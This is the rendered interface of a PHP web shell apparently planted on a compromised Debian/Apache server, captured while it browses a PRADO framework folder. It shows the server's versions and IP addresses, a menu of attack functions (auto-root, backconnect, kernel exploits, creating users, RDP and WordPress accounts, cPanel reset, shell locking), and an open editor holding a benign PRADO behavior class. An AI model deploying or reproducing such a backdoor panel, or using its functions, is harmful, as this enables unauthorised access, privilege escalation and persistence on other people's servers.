Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.135.247.237
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Util /
Behaviors /
[ HOME SHELL ]
Name
Size
Permission
Action
TBehaviorParameterLoader.php
9.54
KB
-rw-r--r--
TMapLazyLoadBehavior.php
1.78
KB
-rw-r--r--
TMapRouteBehavior.php
3.46
KB
-rw-r--r--
TPageGlobalizationCharsetBehav...
2.22
KB
-rw-r--r--
TPageNoCacheBehavior.php
2.6
KB
-rw-r--r--
TPageTopAnchorBehavior.php
1.64
KB
-rw-r--r--
TParameterizeBehavior.php
8
KB
-rw-r--r--
TTimeZoneParameterBehavior.php
3.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TPageTopAnchorBehavior.php
<?php /** * TPageTopAnchorBehavior class file. * * @author Brad Anderson <belisoful@icloud.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Util\Behaviors; use Prado\Util\TBehavior; use Prado\TPropertyValue; /** * TPageTopAnchorBehavior class. * * TPageTopAnchorBehavior adds an "<a name='top'>" anchor at the top of * every page just before the TForm. * @author Brad Anderson <belisoful@icloud.com> * @since 4.2.0 */ class TPageTopAnchorBehavior extends TBehavior { /** * @var string the page theme is set to this parameter key */ private $_topAnchor = 'top'; /** * This handles the TPage.OnSaveStateComplete event to place the * '<a name="">' at the last moment and have least interference with * anything else * @return array of events as keys and methods as values */ public function events() { return ['OnSaveStateComplete' => 'addFormANameAnchor']; } /** * This method places an '<a name="">' before the TForm * @param object $page object raising the event * @param mixed $param the parameter of the raised event */ public function addFormANameAnchor($page, $param) { $topanchor = '<a name="' . $this->_topAnchor . '"></a>'; if ($form = $page->getForm()) { $form->getParent()->getControls()->insertBefore($form, $topanchor); } } /** * @return string the top anchor name, defaults to 'top'. */ public function getTopAnchor() { return $this->_topAnchor; } /** * @param string $value the top anchor name. */ public function setTopAnchor($value) { $this->_topAnchor = TPropertyValue::ensureString($value); } }
Close